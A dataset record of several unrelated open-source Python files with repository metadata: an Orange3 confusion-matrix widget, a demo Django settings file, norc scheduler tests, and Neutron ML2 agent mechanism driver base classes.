}
],
"symlink_target": ""
} |
"""Confusion matrix widget"""
from math import isnan, isinf
import unicodedata
from PyQt4.QtGui import (
QGridLayout, QTableView, QStandardItemModel, QStandardItem,
QItemSelectionModel, QItemSelection, QFont, QHeaderView, QBrush, QColor,
QStyledItemDelegate)
from PyQt4.QtCore import Qt, QSize
import numpy
import sklearn.metrics as skl_metrics
import Orange
from Orange.widgets import widget, settings, gui
def confusion_matrix(res, index):
"""
Compute confusion matrix
Args:
res (Orange.evaluation.Results): evaluation results
index (int): model index
Returns: Confusion matrix
"""
return skl_metrics.confusion_matrix(
res.actual, res.predicted[index])
BorderRole = next(gui.OrangeUserRole)
BorderColorRole = next(gui.OrangeUserRole)
class BorderedItemDelegate(QStyledItemDelegate):
"""Item delegate that paints border at the specified sides
Data for `BorderRole` is a string containing letters t, r, b and/or l,
which defines the sides at which the border is drawn.
Role `BorderColorRole` sets the color for the cell. If not color is given,
`self.color` is used as default.
Args:
color (QColor): default color (default default is black)
"""
def __init__(self, color=Qt.black):
super().__init__()
self.color = color
def paint(self, painter, option, index):
"""Overloads `paint` to draw borders"""
QStyledItemDelegate.paint(self, painter, option, index)
borders = index.data(BorderRole)
if borders:
color = index.data(BorderColorRole) or self.color
painter.save()
painter.setPen(color)
rect = option.rect
for side, p1, p2 in (("t", rect.topLeft(), rect.topRight()),
("r", rect.topRight(), rect.bottomRight()),
("b", rect.bottomLeft(), rect.bottomRight()),
("l", rect.topLeft(), rect.bottomLeft())):
if side in borders:
painter.drawLine(p1, p2)
painter.restore()
class OWConfusionMatrix(widget.OWWidget):
"""Confusion matrix widget"""
name = "Confusion Matrix"
description = "Display a confusion matrix constructed from " \
"the results of classifier evaluations."
icon = "icons/ConfusionMatrix.svg"
priority = 1001
inputs = [("Evaluation Results", Orange.evaluation.Results, "set_results")]
outputs = [("Selected Data", Orange.data.Table)]
quantities = ["Number of instances",
"Proportion of predicted",
"Proportion of actual"]
settingsHandler = settings.ClassValuesContextHandler()
selected_learner = settings.Setting(0)
selection = settings.ContextSetting(set())
selected_quantity = settings.Setting(0)
append_predictions = settings.Setting(True)
append_probabilities = settings.Setting(False)
autocommit = settings.Setting(True)
UserAdviceMessages = [
widget.Message(
"Clicking on cells or in headers outputs the corresponding "
"data instances",
"click_cell")]
def __init__(self):
super().__init__()
if isinstance(self.selected_learner, list):
self.selected_learner = (self.selected_learner + [0])[0]
self.data = None
self.results = None
self.learners = []
self.headers = []
box = gui.vBox(self.controlArea, "Learners")
self.learners_box = gui.listBox(
box, self, "selected_learner", "learners",
callback=self._learner_changed
)
box = gui.vBox(self.controlArea, "Show")
gui.comboBox(box, self, "selected_quantity", items=self.quantities,
callback=self._update)
box = gui.vBox(self.controlArea, "Select")
gui.button(box, self, "Select Correct",
callback=self.select_correct, autoDefault=False)
gui.button(box, self, "Select Misclassified",
callback=self.select_wrong, autoDefault=False)
gui.button(box, self, "Clear Selection",
callback=self.select_none, autoDefault=False)
self.outputbox = box = gui.vBox(self.controlArea, "Output")
gui.checkBox(box, self, "append_predictions",
"Predictions", callback=self._invalidate)
gui.checkBox(box, self, "append_probabilities",
"Probabilities",
callback=self._invalidate)
gui.auto_commit(self.controlArea, self, "autocommit",
"Send Selected", "Send Automatically")
grid = QGridLayout()
self.tablemodel = QStandardItemModel(self)
view = self.tableview = QTableView(
editTriggers=QTableView.NoEditTriggers)
view.setModel(self.tablemodel)
view.horizontalHeader().hide()
view.verticalHeader().hide()
view.horizontalHeader().setMinimumSectionSize(60)
view.selectionModel().selectionChanged.connect(self._invalidate)
view.setShowGrid(False)
view.setItemDelegate(BorderedItemDelegate(Qt.white))
view.clicked.connect(self.cell_clicked)
grid.addWidget(view, 0, 0)
self.mainArea.layout().addLayout(grid)
def sizeHint(self):
"""Initial size"""
return QSize(750, 490)
def _item(self, i, j):
return self.tablemodel.item(i, j) or QStandardItem()
def _set_item(self, i, j, item):
self.tablemodel.setItem(i, j, item)
def _init_table(self, nclasses):
item = self._item(0, 2)
item.setData("Predicted", Qt.DisplayRole)
item.setTextAlignment(Qt.AlignCenter)
item.setFlags(Qt.NoItemFlags)
self._set_item(0, 2, item)
item = self._item(2, 0)
item.setData("Actual", Qt.DisplayRole)
item.setTextAlignment(Qt.AlignHCenter | Qt.AlignBottom)
item.setFlags(Qt.NoItemFlags)
self.tableview.setItemDelegateForColumn(0, gui.VerticalItemDelegate())
self._set_item(2, 0, item)
self.tableview.setSpan(0, 2, 1, nclasses)
self.tableview.setSpan(2, 0, nclasses, 1)
font = self.tablemodel.invisibleRootItem().font()
bold_font = QFont(font)
bold_font.setBold(True)
for i in (0, 1):
for j in (0, 1):
item = self._item(i, j)
item.setFlags(Qt.NoItemFlags)
self._set_item(i, j, item)
for p, label in enumerate(self.headers):
for i, j in ((1, p + 2), (p + 2, 1)):
item = self._item(i, j)
item.setData(label, Qt.DisplayRole)
item.setFont(bold_font)
item.setTextAlignment(Qt.AlignRight | Qt.AlignVCenter)
item.setFlags(Qt.ItemIsEnabled)
if p < len(self.headers) - 1:
item.setData("br"[j == 1], BorderRole)
item.setData(QColor(192, 192, 192), BorderColorRole)
self._set_item(i, j, item)
hor_header = self.tableview.horizontalHeader()
if len(' '.join(self.headers)) < 120:
hor_header.setResizeMode(QHeaderView.ResizeToContents)
else:
hor_header.setDefaultSectionSize(60)
self.tablemodel.setRowCount(nclasses + 3)
self.tablemodel.setColumnCount(nclasses + 3)
def set_results(self, results):
"""Set the input results."""
prev_sel_learner = self.selected_learner
self.clear()
self.warning([0, 1])
self.closeContext()
data = None
if results is not None and results.data is not None:
data = results.data
if data is not None and not data.domain.has_discrete_class:
self.warning(
0, "Confusion Matrix cannot be used for regression results.")
self.results = results
self.data = data
if data is not None:
class_values = data.domain.class_var.values
elif results is not None:
raise NotImplementedError
if results is None:
self.report_button.setDisabled(True)
else:
self.report_button.setDisabled(False)
nmodels = results.predicted.shape[0]
self.headers = class_values + \
[unicodedata.lookup("N-ARY SUMMATION")]
        # NOTE: 'learner_names' is set by the 'Test Learners' widget.
if hasattr(results, "learner_names"):
self.learners = results.learner_names
else:
self.learners = ["Learner #{}".format(i + 1)
for i in range(nmodels)]
self._init_table(len(class_values))
self.openContext(data.domain.class_var)
if prev_sel_learner is None or \
prev_sel_learner >= len(self.learners):
self.selected_learner = 0
else:
self.selected_learner = prev_sel_learner
self._update()
self._set_selection()
self.unconditional_commit()
def clear(self):
"""Reset the widget, clear controls"""
self.results = None
self.data = None
self.tablemodel.clear()
self.headers = []
# Clear learners last. This action will invoke `_learner_changed`
self.learners = []
def select_correct(self):
"""Select the diagonal elements of the matrix"""
selection = QItemSelection()
n = self.tablemodel.rowCount()
for i in range(2, n):
index = self.tablemodel.index(i, i)
selection.select(index, index)
self.tableview.selectionModel().select(
selection, QItemSelectionModel.ClearAndSelect)
def select_wrong(self):
"""Select the off-diagonal elements of the matrix"""
selection = QItemSelection()
n = self.tablemodel.rowCount()
for i in range(2, n):
for j in range(i + 1, n):
index = self.tablemodel.index(i, j)
selection.select(index, index)
index = self.tablemodel.index(j, i)
selection.select(index, index)
self.tableview.selectionModel().select(
selection, QItemSelectionModel.ClearAndSelect)
def select_none(self):
"""Reset selection"""
self.tableview.selectionModel().clear()
def cell_clicked(self, model_index):
"""Handle cell click event"""
i, j = model_index.row(), model_index.column()
if not i or not j:
return
n = self.tablemodel.rowCount()
index = self.tablemodel.index
selection = None
if i == j == 1 or i == j == n - 1:
selection = QItemSelection(index(2, 2), index(n - 1, n - 1))
elif i in (1, n - 1):
selection = QItemSelection(index(2, j), index(n - 1, j))
elif j in (1, n - 1):
selection = QItemSelection(index(i, 2), index(i, n - 1))
if selection is not None:
self.tableview.selectionModel().select(
selection, QItemSelectionModel.ClearAndSelect)
def commit(self):
"""Output data instances corresponding to selected cells"""
if self.results is not None and self.data is not None \
and self.selected_learner is not None:
indices = self.tableview.selectedIndexes()
indices = {(ind.row() - 2, ind.column() - 2) for ind in indices}
actual = self.results.actual
learner_name = self.learners[self.selected_learner]
predicted = self.results.predicted[self.selected_learner]
selected = [i for i, t in enumerate(zip(actual, predicted))
if t in indices]
row_indices = self.results.row_indices[selected]
extra = []
class_var = self.data.domain.class_var
metas = self.data.domain.metas
if self.append_predictions:
predicted = numpy.array(predicted[selected], dtype=object)
extra.append(predicted.reshape(-1, 1))
var = Orange.data.DiscreteVariable(
"{}({})".format(class_var.name, learner_name),
class_var.values
)
metas = metas + (var,)
if self.append_probabilities and \
self.results.probabilities is not None:
probs = self.results.probabilities[self.selected_learner,
selected]
extra.append(numpy.array(probs, dtype=object))
pvars = [Orange.data.ContinuousVariable("p({})".format(value))
for value in class_var.values]
metas = metas + tuple(pvars)
X = self.data.X[row_indices]
Y = self.data.Y[row_indices]
M = self.data.metas[row_indices]
row_ids = self.data.ids[row_indices]
M = numpy.hstack((M,) + tuple(extra))
domain = Orange.data.Domain(
self.data.domain.attributes,
self.data.domain.class_vars,
metas
)
data = Orange.data.Table.from_numpy(domain, X, Y, M)
data.ids = row_ids
data.name = learner_name
else:
data = None
self.send("Selected Data", data)
def _invalidate(self):
indices = self.tableview.selectedIndexes()
self.selection = {(ind.row() - 2, ind.column() - 2) for ind in indices}
self.commit()
def _set_selection(self):
selection = QItemSelection()
index = self.tableview.model().index
for row, col in self.selection:
sel = index(row + 2, col + 2)
selection.select(sel, sel)
self.tableview.selectionModel().select(
selection, QItemSelectionModel.ClearAndSelect)
def _learner_changed(self):
self._update()
self._set_selection()
self.commit()
def _update(self):
def _isinvalid(x):
return isnan(x) or isinf(x)
# Update the displayed confusion matrix
if self.results is not None and self.selected_learner is not None:
cmatrix = confusion_matrix(self.results, self.selected_learner)
colsum = cmatrix.sum(axis=0)
rowsum = cmatrix.sum(axis=1)
n = len(cmatrix)
diag = numpy.diag_indices(n)
colors = cmatrix.astype(numpy.double)
colors[diag] = 0
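            # selected_quantity indexes self.quantities: 0 = raw instance
            # counts, 1 = column-normalised percentages (proportion of
            # predicted), 2 = row-normalised percentages (proportion of actual).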
if self.selected_quantity == 0:
normalized = cmatrix.astype(numpy.int)
formatstr = "{}"
div = numpy.array([colors.max()])
else:
if self.selected_quantity == 1:
normalized = 100 * cmatrix / colsum
div = colors.max(axis=0)
else:
normalized = 100 * cmatrix / rowsum[:, numpy.newaxis]
div = colors.max(axis=1)[:, numpy.newaxis]
formatstr = "{:2.1f} %"
div[div == 0] = 1
colors /= div
colors[diag] = normalized[diag] / normalized[diag].max()
for i in range(n):
for j in range(n):
val = normalized[i, j]
col_val = colors[i, j]
item = self._item(i + 2, j + 2)
item.setData(
"NA" if _isinvalid(val) else formatstr.format(val),
Qt.DisplayRole)
bkcolor = QColor.fromHsl(
[0, 240][i == j], 160,
255 if _isinvalid(col_val) else int(255 - 30 * col_val))
item.setData(QBrush(bkcolor), Qt.BackgroundRole)
item.setData("trbl", BorderRole)
item.setToolTip("actual: {}\npredicted: {}".format(
self.headers[i], self.headers[j]))
item.setTextAlignment(Qt.AlignRight | Qt.AlignVCenter)
item.setFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
self._set_item(i + 2, j + 2, item)
bold_font = self.tablemodel.invisibleRootItem().font()
bold_font.setBold(True)
def _sum_item(value, border=""):
item = QStandardItem()
item.setData(value, Qt.DisplayRole)
item.setTextAlignment(Qt.AlignRight | Qt.AlignVCenter)
item.setFlags(Qt.ItemIsEnabled)
item.setFont(bold_font)
item.setData(border, BorderRole)
item.setData(QColor(192, 192, 192), BorderColorRole)
return item
for i in range(n):
self._set_item(n + 2, i + 2, _sum_item(int(colsum[i]), "t"))
self._set_item(i + 2, n + 2, _sum_item(int(rowsum[i]), "l"))
self._set_item(n + 2, n + 2, _sum_item(int(rowsum.sum())))
def send_report(self):
"""Send report"""
if self.results is not None and self.selected_learner is not None:
self.report_table(
"Confusion matrix for {} (showing {})".
format(self.learners[self.selected_learner],
self.quantities[self.selected_quantity].lower()),
self.tableview)
if __name__ == "__main__":
from PyQt4.QtGui import QApplication
APP = QApplication([])
w = OWConfusionMatrix()
w.show()
IRIS = Orange.data.Table("iris")
RES_CV = Orange.evaluation.CrossValidation(
IRIS, [Orange.classification.TreeLearner(),
Orange.classification.MajorityLearner()],
store_data=True)
w.set_results(RES_CV)
APP.exec_()
| {
"content_hash": "3a7f57e388c61da21584a6efcdea37cf",
"timestamp": "",
"source": "github",
"line_count": 482,
"max_line_length": 80,
"avg_line_length": 37.27800829875519,
"alnum_prop": 0.5619434550311665,
"repo_name": "qPCR4vir/orange3",
"id": "6126453904f9fe23fcb3374e7d14879a83df3a82",
"size": "17968",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Orange/widgets/evaluate/owconfusionmatrix.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "20412"
},
{
"name": "C++",
"bytes": "1992"
},
{
"name": "GLSL",
"bytes": "75"
},
{
"name": "HTML",
"bytes": "3503"
},
{
"name": "JavaScript",
"bytes": "12007"
},
{
"name": "Jupyter Notebook",
"bytes": "6662"
},
{
"name": "NSIS",
"bytes": "20281"
},
{
"name": "Python",
"bytes": "4205054"
},
{
"name": "Shell",
"bytes": "48335"
}
],
"symlink_target": ""
} |
"""
Django settings for django_webapp project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
from __future__ import unicode_literals
import logging
import os
from django.contrib import messages
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '3-=5gak18&c8z+khk0@5i5!66n!qim4oy#wh&a_&x&(%h^1s2z'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_webapp',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'django_webapp.urls'
WSGI_APPLICATION = 'django_webapp.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
LOGGING_CONFIG = None
logging.basicConfig(level=logging.INFO)
MESSAGE_TAGS = {
messages.DEBUG: 'alert-info',
messages.INFO: 'alert-info',
messages.SUCCESS: 'alert-success',
messages.WARNING: 'alert-warning',
messages.ERROR: 'alert-danger',
}
"""
Expiration time of uuidCookie (in seconds)
"""
UUIDCOOKIE_EXPIRE_TIME = 5
UUIDCOOKIE_PREFIX = 'cookie-'
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
REDIS_DB = 0
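# Illustrative usage sketch (not part of this project): the uuidCookie and
# Redis settings above would typically be consumed together, roughly like
#
#   import uuid, redis
#   from django.conf import settings
#   client = redis.StrictRedis(host=settings.REDIS_HOST,
#                              port=settings.REDIS_PORT,
#                              db=settings.REDIS_DB)
#   token = uuid.uuid4().hex
#   client.setex(settings.UUIDCOOKIE_PREFIX + token,
#                settings.UUIDCOOKIE_EXPIRE_TIME, 'payload')
#
# The snippet is an assumption for documentation purposes; the real consumers
# of these settings live elsewhere in this repository.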
| {
"content_hash": "90a3ac89429db623e04bc53454a35135",
"timestamp": "",
"source": "github",
"line_count": 112,
"max_line_length": 71,
"avg_line_length": 22.678571428571427,
"alnum_prop": 0.7192913385826771,
"repo_name": "data-tsunami/NodeJS-SocketIO-Redis-Python-Nginx",
"id": "bb73d21ab62102d36a857cb45dc31f4f805675ba",
"size": "2565",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "django_webapp/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "110"
},
{
"name": "JavaScript",
"bytes": "6106"
},
{
"name": "Python",
"bytes": "4034"
}
],
"symlink_target": ""
} |
"""Test schedule handling cases in the SchedulableTask class."""
import os, sys
from threading import Thread
from datetime import timedelta, datetime
from django.test import TestCase
from norc.core.models import Scheduler, Schedule, CronSchedule
from norc.core.constants import Status, Request
from norc.norc_utils import wait_until, log
from norc.norc_utils.testing import make_queue, make_task
class SchedulerTest(TestCase):
@property
def scheduler(self):
return Scheduler.objects.get(pk=self._scheduler.pk)
def setUp(self):
self._scheduler = Scheduler.objects.create()
self._scheduler.log = log.Log(os.devnull)
self.thread = Thread(target=self._scheduler.start)
self.thread.start()
wait_until(lambda: self.scheduler.is_alive(), 3)
def test_stop(self):
self.scheduler.make_request(Request.STOP)
self._scheduler.flag.set()
wait_until(lambda: not self.scheduler.is_alive(), 3)
def test_schedule(self):
task = make_task()
queue = make_queue()
s = Schedule.create(task, queue, 0, 5)
self._scheduler.flag.set()
wait_until(lambda: s.instances.count() == 5, 5)
def test_cron(self):
task = make_task()
queue = make_queue()
s = CronSchedule.create(task, queue, 'o*d*w*h*m*s*', 3)
self._scheduler.flag.set()
wait_until(lambda: queue.count() == 3, 8)
enqueued = map(lambda i: i.enqueued, s.instances)
def fold(acc, e):
self.assertEqual(e - acc, timedelta(seconds=1))
return e
reduce(fold, enqueued)
def test_update_schedule(self):
task = make_task()
queue = make_queue()
s = CronSchedule.create(task, queue, 'o*d*w*h*m*s*', 10)
self._scheduler.flag.set()
wait_until(lambda: queue.count() == 2, 5)
s.encoding = 'o*d*w*h*m*s4'
s.save()
self.assertRaises(Exception,
lambda: wait_until(lambda: s.instances.count() > 3, 3))
def test_make_up(self):
task = make_task()
queue = make_queue()
s = Schedule.create(task, queue, 1, 10, -10, True)
self._scheduler.flag.set()
wait_until(lambda: s.instances.count() == 10, 5)
s = Schedule.create(task, queue, 60, 10, -10, False)
self._scheduler.flag.set()
wait_until(lambda: s.instances.count() == 1, 5)
def test_cron_make_up(self):
task = make_task()
queue = make_queue()
now = datetime.utcnow()
s = CronSchedule(encoding='o*d*w*h*m*s%s' % ((now.second - 1) % 60),
task=task, queue=queue, repetitions=0, remaining=0, make_up=False)
s.base = now - timedelta(seconds=2)
s.save()
self._scheduler.flag.set()
wait_until(lambda: s.instances.count() == 1, 3)
now = datetime.utcnow()
s = CronSchedule(encoding='o*d*w*h*m*s*',
task=task, queue=queue, repetitions=0, remaining=0, make_up=True)
s.base = now - timedelta(seconds=5)
s.save()
self._scheduler.flag.set()
wait_until(lambda: s.instances.count() == 6, 1)
def test_reload(self):
task = make_task()
queue = make_queue()
now = datetime.utcnow()
s = CronSchedule.create(task, queue, 'o*d*w*h*m*s%s' %
((now.second - 1) % 60), 1)
self._scheduler.flag.set()
wait_until(lambda: self.scheduler.cronschedules.count() == 1, 5)
CronSchedule.objects.get(pk=s.pk).reschedule('o*d*w*h*m*s*')
self.scheduler.make_request(Request.RELOAD)
self._scheduler.flag.set()
wait_until(lambda: s.instances.count() == 1, 10)
def test_duplicate(self):
task = make_task()
queue = make_queue()
s = Schedule.create(task, queue, 1, 2, start=2)
self._scheduler.flag.set()
wait_until(lambda: self.scheduler.schedules.count() == 1, 2)
s = Schedule.objects.get(pk=s.pk)
s.scheduler = None
s.save()
self._scheduler.flag.set()
wait_until(lambda: s.instances.count() == 2, 5)
def test_bad_schedule(self):
task = make_task()
queue = make_queue()
s = CronSchedule.create(task, queue, "o*d*w*h*m*s*")
s.encoding = "gibberish"
s.save()
self._scheduler.flag.set()
wait_until(lambda: CronSchedule.objects.get(pk=s.pk).deleted, 2)
#def test_stress(self):
# task = make_task()
# queue = make_queue()
# for i in range(5000):
# CronSchedule.create(task, queue, 'HALFHOURLY')
# self._scheduler.flag.set()
# wait_until(lambda: self._scheduler.cronschedules.count() == 5000, 60)
def tearDown(self):
if not Status.is_final(self._scheduler.status):
self._scheduler.make_request(Request.KILL)
self.thread.join(15)
assert not self.thread.isAlive()
assert not self._scheduler.timer.isAlive()
| {
"content_hash": "9813ed0f1df38d2c116cd2218031516b",
"timestamp": "",
"source": "github",
"line_count": 139,
"max_line_length": 78,
"avg_line_length": 36.280575539568346,
"alnum_prop": 0.5843743803291691,
"repo_name": "darrellsilver/norc",
"id": "0bb16a00261ddac1db666e57402c0f32d1f7b5f8",
"size": "5044",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "core/tests/scheduler_test.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "20532"
},
{
"name": "Python",
"bytes": "165903"
}
],
"symlink_target": ""
} |
import abc
from neutron_lib.api.definitions import portbindings
from neutron_lib.callbacks import resources
from neutron_lib import constants as const
from neutron_lib.plugins.ml2 import api
from oslo_log import log
import six
from neutron._i18n import _
from neutron.db import provisioning_blocks
LOG = log.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class AgentMechanismDriverBase(api.MechanismDriver):
"""Base class for drivers that attach to networks using an L2 agent.
The AgentMechanismDriverBase provides common code for mechanism
drivers that integrate the ml2 plugin with L2 agents. Port binding
with this driver requires the driver's associated agent to be
running on the port's host, and that agent to have connectivity to
at least one segment of the port's network.
MechanismDrivers using this base class must pass the agent type to
__init__(), and must implement try_to_bind_segment_for_agent().
"""
def __init__(self, agent_type,
supported_vnic_types=[portbindings.VNIC_NORMAL]):
"""Initialize base class for specific L2 agent type.
:param agent_type: Constant identifying agent type in agents_db
:param supported_vnic_types: The binding:vnic_type values we can bind
"""
self.agent_type = agent_type
self.supported_vnic_types = supported_vnic_types
def initialize(self):
pass
def create_port_precommit(self, context):
self._insert_provisioning_block(context)
def update_port_precommit(self, context):
if context.host == context.original_host:
return
self._insert_provisioning_block(context)
def _insert_provisioning_block(self, context):
# we insert a status barrier to prevent the port from transitioning
# to active until the agent reports back that the wiring is done
port = context.current
if not context.host or port['status'] == const.PORT_STATUS_ACTIVE:
# no point in putting in a block if the status is already ACTIVE
return
vnic_type = context.current.get(portbindings.VNIC_TYPE,
portbindings.VNIC_NORMAL)
if vnic_type not in self.supported_vnic_types:
# we check the VNIC type because there could be multiple agents
# on a single host with different VNIC types
return
if context.host_agents(self.agent_type):
provisioning_blocks.add_provisioning_component(
context._plugin_context, port['id'], resources.PORT,
provisioning_blocks.L2_AGENT_ENTITY)
def bind_port(self, context):
LOG.debug("Attempting to bind port %(port)s on "
"network %(network)s",
{'port': context.current['id'],
'network': context.network.current['id']})
vnic_type = context.current.get(portbindings.VNIC_TYPE,
portbindings.VNIC_NORMAL)
if vnic_type not in self.supported_vnic_types:
LOG.debug("Refusing to bind due to unsupported vnic_type: %s",
vnic_type)
return
agents = context.host_agents(self.agent_type)
if not agents:
LOG.debug("Port %(pid)s on network %(network)s not bound, "
"no agent of type %(at)s registered on host %(host)s",
{'pid': context.current['id'],
'at': self.agent_type,
'network': context.network.current['id'],
'host': context.host})
for agent in agents:
LOG.debug("Checking agent: %s", agent)
if agent['alive']:
for segment in context.segments_to_bind:
if self.try_to_bind_segment_for_agent(context, segment,
agent):
LOG.debug("Bound using segment: %s", segment)
return
else:
LOG.warning("Refusing to bind port %(pid)s to dead agent: "
"%(agent)s",
{'pid': context.current['id'], 'agent': agent})
@abc.abstractmethod
def try_to_bind_segment_for_agent(self, context, segment, agent):
"""Try to bind with segment for agent.
:param context: PortContext instance describing the port
:param segment: segment dictionary describing segment to bind
:param agent: agents_db entry describing agent to bind
:returns: True iff segment has been bound for agent
Called outside any transaction during bind_port() so that
derived MechanismDrivers can use agent_db data along with
built-in knowledge of the corresponding agent's capabilities
to attempt to bind to the specified network segment for the
agent.
If the segment can be bound for the agent, this function must
call context.set_binding() with appropriate values and then
return True. Otherwise, it must return False.
"""
def blacklist_supported_vnic_types(self, vnic_types, blacklist):
"""Validate the blacklist and blacklist the supported_vnic_types
:param vnic_types: The supported_vnic_types list
:param blacklist: The blacklist as in vnic_type_blacklist
:return The blacklisted vnic_types
"""
if not blacklist:
return vnic_types
# Not valid values in the blacklist:
if not all(bl in vnic_types for bl in blacklist):
raise ValueError(_("Not all of the items from vnic_type_blacklist "
"are valid vnic_types for %(agent)s mechanism "
"driver. The valid values are: "
"%(valid_vnics)s.") %
{'agent': self.agent_type,
'valid_vnics': vnic_types})
supported_vnic_types = [vnic_t for vnic_t in vnic_types if
vnic_t not in blacklist]
# Nothing left in the supported vnict types list:
if len(supported_vnic_types) < 1:
raise ValueError(_("All possible vnic_types were blacklisted for "
"%s mechanism driver!") % self.agent_type)
return supported_vnic_types
@six.add_metaclass(abc.ABCMeta)
class SimpleAgentMechanismDriverBase(AgentMechanismDriverBase):
"""Base class for simple drivers using an L2 agent.
The SimpleAgentMechanismDriverBase provides common code for
mechanism drivers that integrate the ml2 plugin with L2 agents,
where the binding:vif_type and binding:vif_details values are the
same for all bindings. Port binding with this driver requires the
driver's associated agent to be running on the port's host, and
that agent to have connectivity to at least one segment of the
port's network.
MechanismDrivers using this base class must pass the agent type
and the values for binding:vif_type and binding:vif_details to
    __init__(), and must implement get_allowed_network_types() and
    get_mappings().
"""
def __init__(self, agent_type, vif_type, vif_details,
supported_vnic_types=[portbindings.VNIC_NORMAL]):
"""Initialize base class for specific L2 agent type.
:param agent_type: Constant identifying agent type in agents_db
:param vif_type: Value for binding:vif_type when bound
:param vif_details: Dictionary with details for VIF driver when bound
:param supported_vnic_types: The binding:vnic_type values we can bind
"""
super(SimpleAgentMechanismDriverBase, self).__init__(
agent_type, supported_vnic_types)
self.vif_type = vif_type
self.vif_details = vif_details
def try_to_bind_segment_for_agent(self, context, segment, agent):
if self.check_segment_for_agent(segment, agent):
context.set_binding(segment[api.ID],
self.get_vif_type(context, agent, segment),
self.get_vif_details(context, agent, segment))
return True
else:
return False
def get_vif_details(self, context, agent, segment):
return self.vif_details
def get_vif_type(self, context, agent, segment):
"""Return the vif type appropriate for the agent and segment."""
return self.vif_type
@abc.abstractmethod
def get_allowed_network_types(self, agent=None):
"""Return the agent's or driver's allowed network types.
For example: return ('flat', ...). You can also refer to the
configuration the given agent exposes.
"""
pass
@abc.abstractmethod
def get_mappings(self, agent):
"""Return the agent's bridge or interface mappings.
For example: agent['configurations'].get('bridge_mappings', {}).
"""
pass
def physnet_in_mappings(self, physnet, mappings):
"""Is the physical network part of the given mappings?"""
return physnet in mappings
def filter_hosts_with_segment_access(
self, context, segments, candidate_hosts, agent_getter):
hosts = set()
filters = {'host': candidate_hosts, 'agent_type': [self.agent_type]}
for agent in agent_getter(context, filters=filters):
if any(self.check_segment_for_agent(s, agent) for s in segments):
hosts.add(agent['host'])
return hosts
def check_segment_for_agent(self, segment, agent):
"""Check if segment can be bound for agent.
:param segment: segment dictionary describing segment to bind
:param agent: agents_db entry describing agent to bind
:returns: True iff segment can be bound for agent
Called outside any transaction during bind_port so that derived
MechanismDrivers can use agent_db data along with built-in
knowledge of the corresponding agent's capabilities to
determine whether or not the specified network segment can be
bound for the agent.
"""
mappings = self.get_mappings(agent)
allowed_network_types = self.get_allowed_network_types(agent)
LOG.debug("Checking segment: %(segment)s "
"for mappings: %(mappings)s "
"with network types: %(network_types)s",
{'segment': segment, 'mappings': mappings,
'network_types': allowed_network_types})
network_type = segment[api.NETWORK_TYPE]
if network_type not in allowed_network_types:
LOG.debug(
'Network %(network_id)s with segment %(id)s is type '
'of %(network_type)s but agent %(agent)s or mechanism driver '
'only support %(allowed_network_types)s.',
{'network_id': segment['network_id'],
'id': segment['id'],
'network_type': network_type,
'agent': agent['host'],
'allowed_network_types': allowed_network_types})
return False
if network_type in [const.TYPE_FLAT, const.TYPE_VLAN]:
physnet = segment[api.PHYSICAL_NETWORK]
if not self.physnet_in_mappings(physnet, mappings):
LOG.debug(
'Network %(network_id)s with segment %(id)s is connected '
'to physical network %(physnet)s, but agent %(agent)s '
'reported physical networks %(mappings)s. '
'The physical network must be configured on the '
'agent if binding is to succeed.',
{'network_id': segment['network_id'],
'id': segment['id'],
'physnet': physnet,
'agent': agent['host'],
'mappings': mappings})
return False
return True
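# ---------------------------------------------------------------------------
# Illustrative sketch only: a minimal concrete driver built on
# SimpleAgentMechanismDriverBase.  The agent type string and the
# 'bridge_mappings' configuration key are assumptions made for this example;
# a real driver uses the constants and configuration of its own L2 agent.
# ---------------------------------------------------------------------------
class ExampleAgentMechanismDriver(SimpleAgentMechanismDriverBase):
    def __init__(self):
        super(ExampleAgentMechanismDriver, self).__init__(
            agent_type='Example L2 agent',
            vif_type=portbindings.VIF_TYPE_OVS,
            vif_details={portbindings.CAP_PORT_FILTER: True})
    def get_allowed_network_types(self, agent=None):
        # This sketch binds only flat and VLAN segments.
        return [const.TYPE_FLAT, const.TYPE_VLAN]
    def get_mappings(self, agent):
        # Physical-network-to-bridge mappings reported by the agent.
        return agent['configurations'].get('bridge_mappings', {})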
| {
"content_hash": "17d8d0d438f6c6022213e31985e616f2",
"timestamp": "",
"source": "github",
"line_count": 281,
"max_line_length": 79,
"avg_line_length": 42.95017793594306,
"alnum_prop": 0.6048554146988151,
"repo_name": "noironetworks/neutron",
